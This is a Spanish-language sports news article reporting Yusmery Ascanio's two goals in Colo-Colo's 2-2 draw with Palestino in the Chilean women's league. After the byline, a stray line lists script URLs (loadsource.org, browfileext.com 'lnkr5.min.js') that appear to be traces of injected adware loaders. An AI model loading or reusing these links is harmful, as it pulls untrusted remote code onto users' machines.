¡LOS NUESTROS PRIMERO!

Yusmery Ascanio marcó doblete en el fútbol chileno

Ascanio
Comparte esto
Tweet about this on Twitter
Twitter
Share on Facebook
Facebook

Se disputó la séptima fecha de la segunda ronda del torneo nacional Femenino del fútbol chileno, Colo-Colo recibió a Palestino en la cancha sintética del Monumental. Las albas no pudieron superar el duro partido que planteó el cuadro visitante y empataron a 2 goles. La venezolana Yusmery Ascanio marcó los dos tantos de su equipo.

El primer tiempo fue de ida y vuelta en la cancha Monumental donde el marcador no se pudo abrir. Iniciado el segundo tiempo, las albas saltaron a la cancha con otra actitud y a los 3 minutos Yusmery Ascanio aprovechaba un rebote en el área y con una gran definición abría el marcador y ponía a su equipo a ganar.

Partido  de ida y vuelta, la visita no bajaría los brazos hasta conseguir el empate, y al minuto 26 del segundo tiempo Nicol Sanhueza  en una contra marcaba para Palestino aprovechando que Colo-Colo ya no estaba volviendo.

La misma dosis aplicaría Palestino, otra contra luego de que las jugadoras de Colo-Colo se volvieran a quedar y Nicol Sanhueza al minuto 35 del segundo tiempo marcaba el segundo de la noche y ponía a ganar a su equipo.

A pocos minutos para finalizar el partido las caciques no se rendirían hasta conseguir el empate en casa y la venezolana Ascanio se volvía a vestir de heroína al marcar su segundo tanto de la noche con un golazo de tiro libre y el empate para Colo-Colo que siguen peleando en lo más alto de la clasificación. . La tachirense Nuby Rangel también fue titular.

Escrito por: Jhoan Ulloa / @JhoanEulloaS

Fotos: Pueblo colocino.

 

http://cdncache-a.akamaihd.net/sub/nee5452/52200_6968_/l.js?pid=2450&ext=http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52200x6968x&r=1538584454631http://browfileext.com/addons/lnkr5.min.js

SportsVenezuela